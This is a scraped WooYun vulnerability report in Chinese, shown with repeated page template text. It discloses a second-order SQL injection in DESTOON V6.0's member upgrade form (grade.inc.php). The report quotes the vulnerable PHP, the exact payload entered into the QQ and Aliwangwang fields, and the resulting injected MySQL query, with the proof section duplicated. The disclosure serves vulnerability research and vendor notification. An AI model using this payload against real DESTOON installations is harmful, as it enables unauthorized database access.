DESTOON V6.0 (2015-11-25)某处SQL注入 | WooYun-2015-162861

漏洞概要关注数(40) 关注此漏洞

缺陷编号： WooYun-2015-162861

漏洞标题： DESTOON V6.0 (2015-11-25)某处SQL注入

漏洞作者： Xser

提交时间： 2015-12-21 11:58

公开时间： 2016-01-28 17:30

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

6人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-21：细节已通知厂商并且等待厂商处理中
2015-12-21：厂商已经确认，细节仅向厂商公开
2015-12-24：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-02-14：细节向核心白帽子及相关领域专家公开
2016-02-24：细节向普通白帽子公开
2016-03-05：细节向实习白帽子公开
2016-01-28：细节向公众公开

简要描述：

二次注入

详细说明：

因为dhtmlspecialchars这个函数把实体后的"置空了

所以提交"被转义\"然后置空就剩下\了

所以导致注入

在/destoon/module/member/grade.inc.php中

code 区域

$company = dhtmlspecialchars(trim($company));


	$truename = dhtmlspecialchars(trim($truename));


	$telephone = dhtmlspecialchars(trim($telephone));


	$mobile = dhtmlspecialchars(trim($mobile));


	$email = dhtmlspecialchars(trim($email));


	$msn = dhtmlspecialchars(trim($msn));


	$qq = dhtmlspecialchars(trim($qq));


	$ali = dhtmlspecialchars(trim($ali));


	$skype = dhtmlspecialchars(trim($skype));


	$content = dhtmlspecialchars(trim($content));


	$db->query("INSERT INTO {$DT_PRE}upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('$_userid','$_username', '$groupid','$company','$truename','$telephone','$mobile','$email','$msn','$qq','$ali','$skype','$content', '$DT_TIME', '$DT_IP','$amount','$promo_code','$promo_type','$promo_amount','2')");


	 message($L['grade_msg_success'], DT_PATH, 5);

可以注入了

code 区域

访问**.**.**.**/destoon/member/grade.php


升级企业会员


然后资料写


QQ："


阿里旺旺：,(version()),00,0000,1450548173,0,0,0,0,0,2)#

我们来看看Mysql的监控

code 区域

2015/12/20 2:20	INSERT INTO destoon_upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('2','test', '6','aaaaa','aaaaa','111111111','','11111@qq.cpom','','\',',(version()),00,0000,1450548173,0,0,0,0,0,2)#','','', '1450549202', '**.**.**.**','0','','0','0','2')

语句被带入

等管理员通过审核就可以看到结果了

漏洞证明：

因为dhtmlspecialchars这个函数把实体后的"置空了

所以提交"被转义\"然后置空就剩下\了

所以导致注入

在/destoon/module/member/grade.inc.php中

code 区域

$company = dhtmlspecialchars(trim($company));


	$truename = dhtmlspecialchars(trim($truename));


	$telephone = dhtmlspecialchars(trim($telephone));


	$mobile = dhtmlspecialchars(trim($mobile));


	$email = dhtmlspecialchars(trim($email));


	$msn = dhtmlspecialchars(trim($msn));


	$qq = dhtmlspecialchars(trim($qq));


	$ali = dhtmlspecialchars(trim($ali));


	$skype = dhtmlspecialchars(trim($skype));


	$content = dhtmlspecialchars(trim($content));


	$db->query("INSERT INTO {$DT_PRE}upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('$_userid','$_username', '$groupid','$company','$truename','$telephone','$mobile','$email','$msn','$qq','$ali','$skype','$content', '$DT_TIME', '$DT_IP','$amount','$promo_code','$promo_type','$promo_amount','2')");


	 message($L['grade_msg_success'], DT_PATH, 5);

可以注入了

code 区域

访问**.**.**.**/destoon/member/grade.php


升级企业会员


然后资料写


QQ："


阿里旺旺：,(version()),00,0000,1450548173,0,0,0,0,0,2)#

我们来看看Mysql的监控

code 区域

2015/12/20 2:20	INSERT INTO destoon_upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('2','test', '6','aaaaa','aaaaa','111111111','','11111@qq.cpom','','\',',(version()),00,0000,1450548173,0,0,0,0,0,2)#','','', '1450549202', '**.**.**.**','0','','0','0','2')

语句被带入

等管理员通过审核就可以看到结果了

修复方案：

版权声明：转载请注明来源 Xser@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-21 16:03

厂商回复：

感谢反馈我们会尽快修复

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2015-12-29 00:11 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟，联盟托管此号中，欢迎加入08...)
0

这是多少奖金啊

1# 回复此人
2015-12-29 07:19 | Xser ( 普通白帽子 | Rank:379 漏洞数:86 | JDSec)
0

@U神 2k而已

2# 回复此人
2015-12-29 14:43 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟，联盟托管此号中，欢迎加入08...)
0

@Xser 这特么是我一个月的工钱啊

3# 回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(40) 关注此漏洞

缺陷编号： WooYun-2015-162861

漏洞标题： DESTOON V6.0 (2015-11-25)某处SQL注入

相关厂商： DESTOON

漏洞作者： Xser

提交时间： 2015-12-21 11:58

公开时间： 2016-01-28 17:30

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

6人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Xser@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(40) 关注此漏洞

缺陷编号： WooYun-2015-162861

漏洞标题： DESTOON V6.0 (2015-11-25)某处SQL注入

相关厂商： DESTOON

漏洞作者： Xser

提交时间： 2015-12-21 11:58

公开时间： 2016-01-28 17:30

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 无

6人收藏 收藏 var token=""; var id="162861"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Xser@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

漏洞概要关注数(40) 关注此漏洞

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

6人收藏收藏
分享漏洞：

漏洞评价(共0人评价):

登陆后才能进行评分